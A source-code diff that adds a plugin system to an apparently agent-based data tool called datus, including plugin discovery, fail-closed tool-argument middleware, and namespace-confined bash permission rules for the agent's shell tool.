+  "installed, not configured" note pointing at its bundled setup skill so the
+  agent can walk the user through configuration. datus prepends its own
+  ``## Plugins`` preamble naming the loaded config file, so the plugin text
+  must not hard-code config paths. Return ``None`` when there is truly nothing
+  to say.
+* ``PluginClass.cli_permissions() -> dict | None`` — *optional* classmethod/
+  staticmethod/attribute declaring bash-permission rules for the plugin's own
+  CLI namespace, keyed by permission profile::
+
+      {"normal": {"allow": ["greet:*"], "ask": ["config set:*"]},
+       "auto":   {"allow": ["greet:*", "config set:*"]}}
+
+  Patterns are **relative to the plugin namespace** — datus prefixes each with
+  ``datus <name> ``, so ``greet:*`` becomes ``datus <name> greet:*`` and a
+  plugin can never affect commands outside its own namespace. Pattern syntax
+  matches ``permissions.bash_commands`` in agent.yml (``cmd`` exact,
+  ``cmd:*`` prefix, ``cmd:glob`` prefix + first-arg glob). Only ``normal`` and
+  ``auto`` keys are accepted (``dangerous`` ignores bash rules by design).
+  These rules only gate the **agent's** bash tool when it runs ``datus
+  <name> ...`` — a human invoking the CLI directly is never gated. A plugin
+  rule can never loosen a user ``deny`` from agent.yml, and malformed
+  declarations are warned about and skipped, never fatal. Plugin ``ask``
+  rules can be relaxed per project: the confirmation prompt offers
+  "allow (project)", which persists the exact matched pattern to
+  ``.datus/config.yml``'s ``bash_allow`` and auto-runs it from then on
+  (exact match only; ``deny`` rules are unaffected). Like the other
+  class-level hooks it is resolved **without a profile instance**.
+
+* ``PluginClass.tool_transformers() -> dict | None`` — *optional* classmethod/
+  staticmethod/attribute declaring **tool argument transformers**: callables
+  that inspect and rewrite (or deny) the agent's tool-call arguments before
+  the tool executes. Returns a mapping of tool patterns to a transformer or a
+  list of transformers::
+
+      {"db_tools.execute_sql": enforce_sql_scope}
+      {"execute_sql": [audit_args, enforce_sql_scope]}
+
+  Pattern syntax matches the proxy layer: bare tool name (``execute_sql``),
+  ``category.method`` with fnmatch globs (``db_tools.*``). Each transformer is
+  called as ``transformer(tool_name, args, context) -> dict`` (sync or async):
+  it returns the possibly-modified argument dict to continue, or raises to
+  deny the call — the tool then never runs and the model receives the
+  exception message as a normal tool failure (fail closed). ``context`` is a
+  plain dict with ``node_name``, ``principal`` (request-scoped, empty when the
+  deployment sets none), and ``project_root``. Transformers run in-process
+  with full access to every matched tool call's arguments — they are trusted
+  code, gated by the same ``agent.plugins_enabled`` master switch as the rest
+  of the plugin surface. They only cover LLM-driven tool calls; direct Python
+  invocations of tool methods bypass them. Like the other class-level hooks it
+  is resolved **without a profile instance**, and a malformed declaration is
+  warned about and skipped, never fatal.
+
+Plugins that need configuration should also bundle a ``<name>-setup`` skill
+(next to their main skill under ``skills_dir()``) describing the profile YAML
+shape, which fields to ask the user for, and how to verify — with secrets
+referenced as ``${ENV_VAR}`` placeholders, never literal values.
+
+The whole plugin system is gated by ``agent.plugins_enabled`` (default
+``true``): when ``false``, CLI dispatch, skill discovery, and prompt injection
+are all disabled — intended for API/web deployments where the agent must not
+edit configuration files.
+"""
+
+from __future__ import annotations
+
+from typing import List, Optional, Protocol, runtime_checkable
+
+
+@runtime_checkable
+class DatusPlugin(Protocol):
+    """Structural contract for a datus plugin instance.
+
+    Plugins do not import or subclass this — datus calls the methods by name.
+    """
+
+    def run_cli(self, argv: List[str]) -> Optional[int]:  # pragma: no cover - protocol
+        ...

--- a/datus/plugins/registry.py
+++ b/datus/plugins/registry.py
@@ -1,0 +1,450 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Discovery of ``datus.plugins`` entry points.
+
+A plugin package declares one entry point under the ``datus.plugins`` group,
+e.g. ``hello = datus_hello.plugin:HelloPlugin``. This module loads those
+classes and exposes their bundled skill directories, system-prompt sections,
+and CLI bash-permission declarations. See :mod:`datus.plugins.base` for the
+plugin contract.
+
+Every lookup is defensive: a broken or missing plugin must never crash the CLI
+or block skill discovery.
+"""
+
+from __future__ import annotations
+
+import os
+import re
+from pathlib import Path
+from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple
+
+from datus.utils.loggings import get_logger
+
+if TYPE_CHECKING:
+    from datus.tools.permission.bash_rules import BashCommandRules
+
+logger = get_logger(__name__)
+
+PLUGIN_ENTRY_POINT_GROUP = "datus.plugins"
+
+# Entry-point names that may contribute CLI permission patterns. A name with
+# spaces or glob metacharacters could shift what the literal ``datus <name>``
+# anchor matches, breaking the namespace confinement guarantee.
+_SAFE_PLUGIN_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")
+
+_CLI_PERMISSION_PROFILES = ("normal", "auto")
+_CLI_PERMISSION_ACTIONS = ("allow", "ask", "deny")
+
+
+def entry_points_for_group(group: str, name: Optional[str] = None) -> list:
+    """Return entry points in ``group`` (optionally filtered by ``name``).
+
+    Mirrors the py3.10 ``select`` / pre-3.10 dict-shaped fallback used across
+    the codebase (``service_adapter_installer.hot_reload_adapter``). Any error
+    resolves to an empty list — discovery must never raise. Shared by every
+    entry-point consumer (plugin registry, ``datus.cli_commands`` dispatch,
+    ``datus.skills`` discovery) so the compatibility shim lives in one place.
+    """
+    try:
+        import importlib.metadata as importlib_metadata
+
+        eps = importlib_metadata.entry_points()
+        if hasattr(eps, "select"):
+            if name is not None:
+                return list(eps.select(group=group, name=name))
+            return list(eps.select(group=group))
+        # pragma: no cover - legacy Python
+        group_eps = eps.get(group, [])
+        if name is not None:
+            return [ep for ep in group_eps if ep.name == name]
+        return list(group_eps)
+    except Exception as exc:  # noqa: BLE001 - defensive: never crash discovery
+        logger.debug("%s entry-point lookup failed: %s", group, exc)
+        return []
+
+
+def iter_plugin_entry_points() -> list:
+    """Return all entry points registered under ``datus.plugins``."""
+    return entry_points_for_group(PLUGIN_ENTRY_POINT_GROUP)
+
+
+def plugin_entry_point_exists(name: str) -> bool:
+    """True when a ``datus.plugins`` entry point named ``name`` is installed.
+
+    Metadata-only: never imports the plugin package, so callers can consult it
+    BEFORE the ``plugins_enabled`` master switch has been checked without
+    executing third-party module-level code.
+    """
+    return bool(entry_points_for_group(PLUGIN_ENTRY_POINT_GROUP, name=name))
+
+
+def load_plugin_class(name: str) -> Optional[type]:
+    """Load the plugin class registered as ``name``, or ``None``.
+
+    Returns ``None`` when no plugin claims ``name`` so callers fall through to
+    other dispatch paths. A load failure (broken adapter) is logged and also
+    yields ``None`` rather than propagating.
+    """
+    candidates = entry_points_for_group(PLUGIN_ENTRY_POINT_GROUP, name=name)
+    if not candidates:
+        return None
+    if len(candidates) > 1:
+        logger.warning("Multiple datus.plugins entry points named %r; using the first.", name)
+    try:
+        return candidates[0].load()
+    except Exception as exc:  # noqa: BLE001 - a broken plugin must not crash the CLI
+        logger.error("Failed to load plugin '%s': %s", name, exc)
+        return None
+
+
+# Process-level cache of ``(entry_point_name, plugin_class_or_None)`` pairs.
+# Installed plugins cannot change mid-process, and the four collection
+# functions below all run on hot paths (skill discovery, prompt build,
+# per-node transformer wrapping, permission collection) — without the cache
+# each of them re-enumerates distribution metadata and re-imports every
+# plugin package on every call. ``None`` marks a failed load so consumers
+# skip it without retrying the import.
+_PLUGIN_CACHE: Optional[List[Tuple[Optional[str], Optional[type]]]] = None
+
+
+def _loaded_plugins() -> List[Tuple[Optional[str], Optional[type]]]:
+    """Return cached ``(name, plugin_cls)`` pairs for all installed plugins."""
+    global _PLUGIN_CACHE
+    if _PLUGIN_CACHE is None:
+        pairs: List[Tuple[Optional[str], Optional[type]]] = []
+        for ep in iter_plugin_entry_points():
+            name = getattr(ep, "name", None)
+            try:
+                pairs.append((name, ep.load()))
+            except Exception as exc:  # noqa: BLE001 - broken plugin skipped
+                logger.debug("datus.plugins entry point %r failed to load: %s", name, exc)
+                pairs.append((name, None))
+        _PLUGIN_CACHE = pairs
+    return _PLUGIN_CACHE
+
+
+def invalidate_plugin_cache() -> None:
+    """Drop the cached plugin classes (tests / in-process plugin installs)."""
+    global _PLUGIN_CACHE
+    _PLUGIN_CACHE = None
+
+
+def _resolve_class_hook(plugin_cls: type, attr_name: str, expected_desc: str, expected_types: tuple) -> Optional[Any]:
+    """Resolve an optional class-level plugin hook to a validated value.
+
+    The attribute may be a classmethod/staticmethod/function or a plain value
+    (``skills_dir``, ``tool_transformers`` and ``cli_permissions`` all share
+    this contract). Returns ``None`` — never raises — when the hook is absent,
+    resolves to ``None``, raises, or yields an unexpected type: one bad plugin
+    must never break collection.
+    """
+    attr = getattr(plugin_cls, attr_name, None)
+    if attr is None:
+        return None
+    plugin_repr = getattr(plugin_cls, "__name__", plugin_cls)
+    try:
+        value = attr() if callable(attr) else attr
+    except Exception as exc:  # noqa: BLE001 - one bad plugin must not break collection
+        logger.warning("plugin %r %s() failed: %s", plugin_repr, attr_name, exc)
+        return None
+    if value is None:
+        # A hook explicitly returning None means "nothing to contribute".
+        return None
+    if not isinstance(value, expected_types):
+        logger.warning(
+            "plugin %r %s must return %s, got %s; ignoring",
+            plugin_repr,
+            attr_name,
+            expected_desc,
+            type(value).__name__,
+        )
+        return None
+    return value
+
+
+def _skill_dir_of(plugin_cls: type) -> Optional[str]:
+    """Return a plugin class's bundled skill directory if it exposes one.
+
+    ``skills_dir`` may be a callable (classmethod/staticmethod/function) or a
+    plain string/``Path`` attribute. Returns the path only when it resolves to
+    an existing directory.
+    """
+    value = _resolve_class_hook(plugin_cls, "skills_dir", "a str or PathLike", (str, os.PathLike))
+    if value is None:
+        return None
+    candidate = str(value)
+    if candidate and Path(candidate).expanduser().is_dir():
+        return candidate
+    return None
+
+
+def plugin_skill_directories() -> List[str]:
+    """Discover skill directories contributed by installed plugins.
+
+    Iterates ``datus.plugins`` entry points, loads each plugin class, and
+    collects its ``skills_dir()`` when it points at an existing directory.
+    Every failure is swallowed so skill discovery never blocks startup.
+    """
+    found: List[str] = []
+    for _name, plugin_cls in _loaded_plugins():
+        if plugin_cls is None:
+            continue
+        skill_dir = _skill_dir_of(plugin_cls)
+        if skill_dir and skill_dir not in found:
+            found.append(skill_dir)
+    return found
+
+
+def _agent_config_location() -> Optional[str]:
+    """Path of the agent config file actually loaded this process, or ``None``.
+
+    Prefers the ``ConfigurationManager`` singleton (which reflects an explicit
+    ``--config``) and falls back to the default resolution order. Never raises
+    — prompt construction must not break on a missing config.
+    """
+    try:
+        from datus.configuration import agent_config_loader
+
+        mgr = agent_config_loader.CONFIGURATION_MANAGER
+        if mgr is not None:
+            return str(mgr.config_path)
+        return str(agent_config_loader.parse_config_path())
+    except Exception as exc:  # noqa: BLE001 - defensive: never break prompt build
+        logger.debug("agent config location lookup failed: %s", exc)
+        return None
+
+
+def _plugin_config_preamble() -> str:
+    """datus-owned header prepended to the plugin prompt sections.
+
+    Tells the agent where plugin profiles live so it can add or edit them
+    (e.g. when a setup skill walks the user through configuration). Contains
+    only the file path and the config shape — never profile values.
+    """
+    config_path = _agent_config_location()
+    location = f"`{config_path}` " if config_path else "the agent config file (agent.yml) "
+    return (
+        "## Plugins\n"
+        f"Plugin profiles are configured in {location}under "
+        "`agent.plugins.<plugin>.<profile>` (use `${ENV_VAR}` placeholders for secrets). "
+        "`datus <plugin>` commands reload the file on every invocation, so config edits "
+        "take effect immediately without restarting this session."
+    )
+
+
+def plugin_system_prompt_sections(agent_config) -> List[str]:
+    """Collect system-prompt sections contributed by installed plugins.
+
+    Each plugin may expose an *optional* class-level
+    ``system_prompt(profiles) -> str | None`` (classmethod/staticmethod). It is
+    resolved at prompt-build time, i.e. **without an active profile instance**,
+    so it must be reachable at the class level — mirroring ``skills_dir()``.
+
+    datus passes the plugin's *full* profile mapping (all environments, not
+    just the active one) taken from ``agent_config.plugin_services[<ep.name>]``;
+    an installed-but-unconfigured plugin receives ``{}`` and may return setup
+    guidance. The plugin decides which non-secret fields to surface. datus
+    never splices profile values itself. Every failure is swallowed so one bad
+    plugin never blocks prompt construction.
+
+    When at least one plugin contributes a section, a datus-owned ``## Plugins``
+    preamble naming the loaded config file location is prepended so the agent
+    knows where profiles are added or edited.
+    """
+    plugin_services = getattr(agent_config, "plugin_services", None) or {}
+    sections: List[str] = []
+    for name, plugin_cls in _loaded_plugins():
+        if plugin_cls is None:
+            continue
+        attr = getattr(plugin_cls, "system_prompt", None)
+        if not callable(attr):
+            continue
+        profiles = plugin_services.get(name, {})
+        try:
+            section = attr(profiles)
+        except Exception as exc:  # noqa: BLE001 - one bad plugin must not break prompt build
+            logger.debug("plugin %r system_prompt() failed: %s", name, exc)
+            continue
+        if isinstance(section, str) and section.strip():
+            sections.append(section.strip())
+    if sections:
+        sections.insert(0, _plugin_config_preamble())
+    return sections
+
+
+def _tool_transformers_of(plugin_cls: type) -> Optional[dict]:
+    """Resolve a plugin class's optional ``tool_transformers`` declaration.
+
+    Accepts a classmethod/staticmethod/function or a plain dict attribute,
+    mirroring ``_skill_dir_of``. Returns the dict, or ``None`` when absent,
+    malformed, or raising.
+    """
+    return _resolve_class_hook(plugin_cls, "tool_transformers", "a dict", (dict,))
+
+
+def collect_plugin_tool_transformers() -> Dict[str, List]:
+    """Collect tool argument transformers declared by installed plugins.
+
+    Iterates ``datus.plugins`` entry points, resolves each class's optional
+    ``tool_transformers()`` hook, and accumulates a mapping of tool pattern
+    (proxy syntax: ``"execute_sql"``, ``"db_tools.*"``) to a flat transformer
+    list. A declaration value may be a single callable or a list of callables;
+    non-callable entries and non-string patterns are warned about and skipped.
+    Every failure is logged and skipped; collection never raises.
+
+    Transformer semantics (rewrite/deny, fail-closed) are documented in
+    :mod:`datus.plugins.base` and enforced by
+    :mod:`datus.tools.middleware.tool_middleware`.
+    """
+    accumulated: Dict[str, List] = {}
+    for name, plugin_cls in _loaded_plugins():
+        if plugin_cls is None:
+            continue
+        declared = _tool_transformers_of(plugin_cls)
+        if declared is None:
+            continue
+        for pattern, value in declared.items():
+            if not isinstance(pattern, str) or not pattern.strip():
+                logger.warning("Plugin %r tool_transformers has invalid pattern %r; ignoring.", name, pattern)
+                continue
+            transformers = value if isinstance(value, list) else [value]
+            valid = [t for t in transformers if callable(t)]
+            if len(valid) != len(transformers):
+                logger.warning(
+                    "Plugin %r tool_transformers[%r] contains non-callable entries; skipping those.",
+                    name,
+                    pattern,
+                )
+            if valid:
+                accumulated.setdefault(pattern.strip(), []).extend(valid)
+    return accumulated
+
+
+def _prefix_cli_pattern(ep_name: str, pattern: str) -> Optional[str]:
+    """Confine a namespace-relative pattern to ``datus <ep_name> ...``.
+
+    The prefix part (before the first ``:``) gets the two literal anchor
+    tokens prepended; a glob part is reattached verbatim:
+
+    * ``"greet:*"``     -> ``"datus hello greet:*"``
+    * ``"greet"``       -> ``"datus hello greet"`` (stays an exact match)
+    * ``":*"``          -> ``"datus hello:*"`` (the whole namespace)
+
+    Because ``command_matches_pattern`` fnmatches token-by-token anchored at
+    ``argv[0]``, the literal ``datus <ep_name>`` anchor means a plugin can
+    never produce a rule matching commands outside its own namespace. Returns
+    ``None`` for an empty/whitespace-only pattern (caller warns and skips).
+    """
+    raw = pattern.strip()
+    if not raw:
+        return None
+    if ":" in raw:
+        prefix, glob = raw.split(":", 1)
+    else:
+        prefix, glob = raw, None
+    prefix = prefix.strip()
+    new_prefix = f"datus {ep_name} {prefix}" if prefix else f"datus {ep_name}"
+    return f"{new_prefix}:{glob}" if glob is not None else new_prefix
+
+
+def _cli_permissions_of(plugin_cls: type) -> Optional[dict]:
+    """Resolve a plugin class's optional ``cli_permissions`` declaration.
+
+    Accepts a classmethod/staticmethod/function or a plain dict attribute,
+    mirroring ``_skill_dir_of``. Returns the dict, or ``None`` when absent,
+    malformed, or raising.
+    """
+    return _resolve_class_hook(plugin_cls, "cli_permissions", "a dict", (dict,))
+
+
+def collect_plugin_cli_permissions() -> Dict[str, "BashCommandRules"]:
+    """Collect per-profile bash rules declared by installed plugins.
+
+    Iterates ``datus.plugins`` entry points, resolves each class's optional
+    ``cli_permissions()`` hook, validates the shape (profile name ->
+    ``{allow/ask/deny: [patterns]}``), and prefixes every pattern with
+    ``datus <entry-point-name> `` so a plugin can only shape permissions for
+    its own CLI namespace.
+
+    Only ``normal`` and ``auto`` profile keys are accepted; ``dangerous``
+    ignores all bash rules by design and is warned about explicitly. The
+    returned rulesets carry **only** allow/ask/deny lists — never ``default``
+    or ``classifier`` — so plugin declarations can never change a profile's
+    default posture. Every failure is logged and skipped; collection never
+    raises.
+    """
+    from datus.tools.permission.bash_rules import BashCommandRules
+
+    accumulated: Dict[str, Dict[str, List[str]]] = {}
+    seen_names: set = set()
+    for name, plugin_cls in _loaded_plugins():
+        if not isinstance(name, str) or name in seen_names or not name:
+            if name in seen_names:
+                logger.warning("Duplicate datus.plugins entry point %r; using the first for cli_permissions.", name)
+            continue
+        seen_names.add(name)
+        if not _SAFE_PLUGIN_NAME_RE.match(name):
+            logger.warning("Plugin entry-point name %r is not a safe CLI token; skipping its cli_permissions.", name)
+            continue
+        if plugin_cls is None:
+            continue
+        declared = _cli_permissions_of(plugin_cls)
+        if declared is None:
+            continue
+        for profile_key, actions in declared.items():
+            if profile_key == "dangerous":
+                logger.warning(
+                    "Plugin %r declares cli_permissions for 'dangerous'; the dangerous profile "
+                    "ignores bash rules — entry dropped.",
+                    name,
+                )
+                continue
+            if profile_key not in _CLI_PERMISSION_PROFILES:
+                logger.warning("Plugin %r cli_permissions has unknown profile key %r; ignoring.", name, profile_key)
+                continue
+            if not isinstance(actions, dict):
+                logger.warning("Plugin %r cli_permissions[%r] must be a dict; ignoring.", name, profile_key)
+                continue
+            for action, patterns in actions.items():
+                if action not in _CLI_PERMISSION_ACTIONS:
+                    logger.warning(
+                        "Plugin %r cli_permissions[%r] has unknown action %r; ignoring.", name, profile_key, action
+                    )
+                    continue
+                if not isinstance(patterns, list):
+                    logger.warning(
+                        "Plugin %r cli_permissions[%r][%r] must be a list; ignoring.", name, profile_key, action
+                    )
+                    continue
+                for pattern in patterns:
+                    if not isinstance(pattern, str):
+                        logger.warning(
+                            "Plugin %r cli_permissions[%r][%r] entries must be strings, got %s; skipping one.",
+                            name,
+                            profile_key,
+                            action,
+                            type(pattern).__name__,
+                        )
+                        continue
+                    prefixed = _prefix_cli_pattern(name, pattern)
+                    if prefixed is None:
+                        logger.warning(
+                            "Plugin %r cli_permissions[%r][%r] contains an empty pattern; skipping.",
+                            name,
+                            profile_key,
+                            action,
+                        )
+                        continue
+                    accumulated.setdefault(profile_key, {}).setdefault(action, []).append(prefixed)
+
+    return {
+        profile: BashCommandRules(
+            allow=actions.get("allow", []),
+            ask=actions.get("ask", []),
+            deny=actions.get("deny", []),
+        )
+        for profile, actions in accumulated.items()
+    }

--- a/datus/tools/middleware/__init__.py
+++ b/datus/tools/middleware/__init__.py
@@ -1,0 +1,13 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+from datus.tools.middleware.tool_middleware import (
+    apply_tool_transformers,
+    wrap_tool_with_transformers,
+)
+
+__all__ = [
+    "apply_tool_transformers",
+    "wrap_tool_with_transformers",
+]

--- a/datus/tools/middleware/tool_middleware.py
+++ b/datus/tools/middleware/tool_middleware.py
@@ -1,0 +1,221 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Tool argument middleware: rewrite or deny tool calls before execution.
+
+``AgentHooks.on_tool_start`` cannot modify tool arguments — the SDK executes
+``tool_call.arguments`` verbatim and ``ToolContext.tool_arguments`` is a copy.
+This module provides the capability the hook layer cannot: it rebuilds a
+:class:`FunctionTool` whose ``on_invoke_tool`` runs registered *transformers*
+over the LLM-provided arguments first, then delegates to the original tool.
+
+Both execution paths (the SDK Runner and the native Claude loop) converge on
+``FunctionTool.on_invoke_tool``, so wrapping the tool covers every LLM-driven
+call. Python callers that invoke tool methods directly (e.g. reference-template
+execution) bypass ``FunctionTool`` entirely — enforcement that must also cover
+those paths needs its own tool-layer check (see
+``DBFuncTool._enforce_sql_policy``).
+
+Transformer contract (duck-typed so plugin packages never import ``datus.*``):
+
+    transformer(tool_name: str, args: dict, context: dict) -> dict
+
+* May be sync or async.
+* Returns the (possibly modified) argument dict; execution continues with it.
+* Raises to DENY the call: the wrapper returns the standard tool failure
+  payload ``{"success": 0, "error": <reason>, "result": None}`` to the model
+  and the wrapped tool never runs (fail closed). Returning anything that is
+  not a dict is treated the same way.
+* ``context`` carries request-scoped data injected at wrap time (see
+  :func:`apply_tool_transformers`): ``node_name``, ``principal``,
+  ``project_root``.
+"""
+
+from __future__ import annotations
+
+import inspect
+import json
+from typing import Any, Callable, Dict, List, Optional
+
+from agents import FunctionTool
+
+# Pattern matching intentionally shares the proxy layer's semantics
+# ("category.*", bare tool name, fnmatch globs) so operators learn one syntax.
+from datus.tools.proxy.proxy_tool import parse_tool_patterns, tool_name_matches
+from datus.utils.loggings import get_logger
+
+logger = get_logger(__name__)
+
+# Type alias for readability; transformers are duck-typed callables.
+ToolTransformer = Callable[[str, Dict[str, Any], Dict[str, Any]], Any]
+ContextProvider = Callable[[], Dict[str, Any]]
+
+
+def _denial_payload(tool_name: str, reason: str) -> dict:
+    """Standard tool-failure payload returned to the model on deny/failure.
+
+    Mirrors the shape of ``FuncToolResult`` (and the proxy layer's timeout
+    payload) so the model sees a normal tool error instead of a crashed run.
+    """
+    return {
+        "success": 0,
+        "error": f"Tool call '{tool_name}' was blocked by policy: {reason}",
+        "result": None,
+    }
+
+
+def wrap_tool_with_transformers(
+    original: FunctionTool,
+    transformers: List[ToolTransformer],
+    context_provider: Optional[ContextProvider] = None,
+) -> FunctionTool:
+    """Rebuild ``original`` so ``transformers`` run over its arguments first.
+
+    Transformers run in list order; each receives the previous one's output.
+    Any transformer exception (or non-dict return) denies the call fail-closed:
+    the original tool never executes and the model receives a standard failure
+    payload carrying the reason.
+
+    Arguments that do not parse as a JSON object are passed through to the
+    original tool untouched — there is nothing for a transformer to rewrite,
+    and the tool's own malformed-arguments error path stays authoritative.
+
+    ``context_provider`` is called once per invocation so request-scoped values
+    (e.g. a per-request principal set on the owning tool instance after wrap
+    time) are read fresh, not frozen at wrap time.
+    """
+
+    async def transforming_invoke(tool_ctx: Any, args_str: str) -> Any:
+        try:
+            args = json.loads(args_str) if args_str else {}
+        except (json.JSONDecodeError, TypeError):
+            args = None
+        if not isinstance(args, dict):
+            logger.debug("Tool middleware: non-object arguments for '%s'; passing through to the tool", original.name)
+            return await original.on_invoke_tool(tool_ctx, args_str)
+
+        try:
+            context = dict(context_provider()) if context_provider is not None else {}
+        except Exception as e:
+            logger.warning("Tool middleware context provider failed for '%s': %s", original.name, e)
+            context = {}
+
+        for transformer in transformers:
+            transformer_name = getattr(transformer, "__name__", repr(transformer))
+            try:
+                result = transformer(original.name, args, context)
+                if inspect.isawaitable(result):
+                    result = await result
+            except Exception as e:
+                logger.warning(
+                    "Tool transformer %s denied '%s': %s",
+                    transformer_name,
+                    original.name,
+                    e,
+                )
+                return _denial_payload(original.name, str(e) or type(e).__name__)
+            if not isinstance(result, dict):
+                logger.warning(
+                    "Tool transformer %s returned %s for '%s'; denying fail-closed",
+                    transformer_name,
+                    type(result).__name__,
+                    original.name,
+                )
+                return _denial_payload(
+                    original.name,
+                    f"transformer {transformer_name} returned {type(result).__name__} instead of an argument dict",
+                )
+            args = result
+
+        return await original.on_invoke_tool(tool_ctx, json.dumps(args, ensure_ascii=False))
+
+    # Carry over every behavioural field except ``on_invoke_tool``: rebuilding
+    # the tool must not silently re-enable a tool that was disabled/gated, nor
+    # drop its input/output guardrails. Use getattr defaults so the wrapper
+    # keeps working across openai-agents SDK versions that add or rename fields.
+    return FunctionTool(
+        name=original.name,
+        description=original.description,
+        params_json_schema=original.params_json_schema,
+        on_invoke_tool=transforming_invoke,
+        strict_json_schema=original.strict_json_schema,
+        is_enabled=getattr(original, "is_enabled", True),
+        tool_input_guardrails=getattr(original, "tool_input_guardrails", None),
+        tool_output_guardrails=getattr(original, "tool_output_guardrails", None),
+    )
+
+
+def apply_tool_transformers(node: Any, transformers_by_pattern: Dict[str, List[ToolTransformer]]) -> int:
+    """Wrap matching tools on ``node`` with the given transformers, in place.
+
+    Args:
+        node: AgenticNode-like object exposing ``tools``, ``tool_registry``
+            and (optionally) ``proxied_tool_names`` / ``db_func_tool``.
+        transformers_by_pattern: Mapping of tool patterns (proxy syntax:
+            ``"execute_sql"``, ``"db_tools.*"``) to transformer lists.
+
+    Returns:
+        The number of tools that were wrapped.
+
+    Proxied tools are skipped: their execution is delegated to the external
+    client via the stdin proxy channel, so rewriting server-side arguments
+    would not affect what actually runs.
+    """
+    if not transformers_by_pattern:
+        return 0
+
+    # Populate the registry eagerly — matching "category.*" patterns needs it,
+    # and lazy population normally only happens on the first permission check.
+    if hasattr(node, "_populate_tool_registry"):
+        node._populate_tool_registry()
+    registry = node.tool_registry.to_dict() if getattr(node, "tool_registry", None) is not None else {}
+    proxied = getattr(node, "proxied_tool_names", None) or set()
+    node_name = getattr(node, "get_node_name", lambda: "")()
+
+    def context_provider() -> Dict[str, Any]:
+        # Read request-scoped values fresh on every tool call: the API layer
+        # sets ``db_func_tool.principal`` per request, after tools are wrapped.
+        principal = getattr(getattr(node, "db_func_tool", None), "principal", None)
+        agent_config = getattr(node, "agent_config", None)
+        return {
+            "node_name": node_name,
+            "principal": dict(principal) if isinstance(principal, dict) else {},
+            "project_root": getattr(agent_config, "project_root", None),
+            # Live AgentConfig reference so transformers can read their own
+            # plugin profile (``get_plugin_profile``) and datasource metadata.
+            # Duck-typed access only — transformers must not import datus.*.
+            "agent_config": agent_config,
+        }
+
+    parsed_by_pattern = {pattern: parse_tool_patterns([pattern]) for pattern in transformers_by_pattern}
+
+    wrapped_count = 0
+    new_tools = []
+    existing_tools = getattr(node, "tools", None)
+    for tool in existing_tools or []:
+        if not isinstance(tool, FunctionTool):
+            new_tools.append(tool)
+            continue
+        if tool.name in proxied:
+            logger.debug("Tool middleware: skipping proxied tool '%s'", tool.name)
+            new_tools.append(tool)
+            continue
+        matched: List[ToolTransformer] = []
+        for pattern, transformers in transformers_by_pattern.items():
+            if tool_name_matches(tool.name, registry, parsed_by_pattern[pattern]):
+                matched.extend(transformers)
+        if matched:
+            logger.info("Tool middleware: wrapping '%s' with %d transformer(s)", tool.name, len(matched))
+            new_tools.append(wrap_tool_with_transformers(tool, matched, context_provider))
+            wrapped_count += 1
+        else:
+            new_tools.append(tool)
+    if existing_tools is None:
+        node.tools = new_tools
+    else:
+        # Mutate in place: callers may have already captured the list object
+        # (e.g. a ``tools=self.tools`` argument evaluated before hooks compose),
+        # and rebinding would leave that captured reference unwrapped.
+        existing_tools[:] = new_tools
+    return wrapped_count

--- a/datus/tools/permission/bash_rules.py
+++ b/datus/tools/permission/bash_rules.py
@@ -57,7 +57,7 @@ import re
 import shlex
 from dataclasses import dataclass
 from enum import Enum
-from typing import Any, Dict, List, Optional
+from typing import Any, Dict, List, Optional, Tuple
 
 from pydantic import BaseModel, ConfigDict, Field
 
@@ -156,6 +156,9 @@ def _has_inline_code_flag(argv: List[str]) -> bool:
 # ``git push``.
 _GROUP_COMMANDS = frozenset(
     {
+        # datus itself hosts plugin CLIs (``datus <plugin> ...``); approving
+        # one plugin's namespace must not green-light the others.
+        "datus",
         "git",
         "docker",
         "npm",
@@ -172,6 +175,53 @@ _GROUP_COMMANDS = frozenset(
         "conda",
     }
 )
+
+
+def _normalize_datus_plugin_argv(argv: List[str]) -> List[str]:
+    """Drop leading datus-global ``--profile`` flags from ``datus <plugin> ...``.
+
+    The plugin dispatcher (``datus/cli/main.py`` ``_split_plugin_globals``)
+    consumes ``--profile <p>`` / ``--profile=<p>`` appearing between the
+    plugin name and the first command token, so ``datus hello --profile prod
+    config set x`` runs the same subcommand as ``datus hello config set x``.
+    Rule matching must see through that, or every profile-qualified
+    invocation falls out of the plugin's declared allow/ask/deny patterns.
+
+    Deliberately NOT stripped:
+
+    * ``--config <path>`` — pointing datus at a different agent.yml rebinds
+      the plugin's credentials/endpoints; a grant persisted for one config
+      must not silently cover another. Commands carrying it fall through to
+      the default decision (ask).
+    * ``--profile`` in sub-command position (``datus hello greet --profile
+      x``) — from the first command token onward every flag belongs to the
+      plugin, mirroring the dispatcher.
+
+    Tradeoff: because ask/allow matching sees through ``--profile``, an allow
+    rule or project grant approved under one profile also covers the others —
+    profiles of one plugin share a trust domain by design (unlike ``--config``,
+    which swaps the whole config file). Users who need to fence off a specific
+    profile can write a deny rule mentioning it: deny rules are additionally
+    matched against the RAW argv (see ``_evaluate_single_command``).
+    """
+    if len(argv) < 3 or argv[0] != "datus" or argv[1].startswith("-"):
+        return argv
+    i = 2
+    n = len(argv)
+    while i < n:
+        tok = argv[i]
+        if tok == "--profile":
+            if i + 1 >= n:
+                break
+            i += 2
+            continue
+        if tok.startswith("--profile="):
+            i += 1
+            continue
+        break
+    if i == 2:
+        return argv
+    return argv[:2] + argv[i:]
 
 
 class BashClassifierConfig(BaseModel):
@@ -285,6 +335,12 @@ class BashRuleDecision:
             unparseable command. Such decisions must never be auto-resolved by
             the future LLM classifier, and must not be offered as persistent
             project-level allows.
+        segment_ask_patterns: For an ASK pipeline decision, the
+            ``(source, matched_pattern)`` of EVERY non-allow segment. The hook's
+            project-grant bypass must cover each segment, not just the
+            representative one — otherwise a grant for one plugin ask rule
+            would auto-run an entire pipeline including unreviewed segments.
+            ``None`` for single-command decisions.
     """
 
     level: PermissionLevel
@@ -293,6 +349,7 @@ class BashRuleDecision:
     reason: str
     bucket: str
     safety_forced: bool = False
+    segment_ask_patterns: Optional[Tuple[Tuple[BashDecisionSource, Optional[str]], ...]] = None
 
 
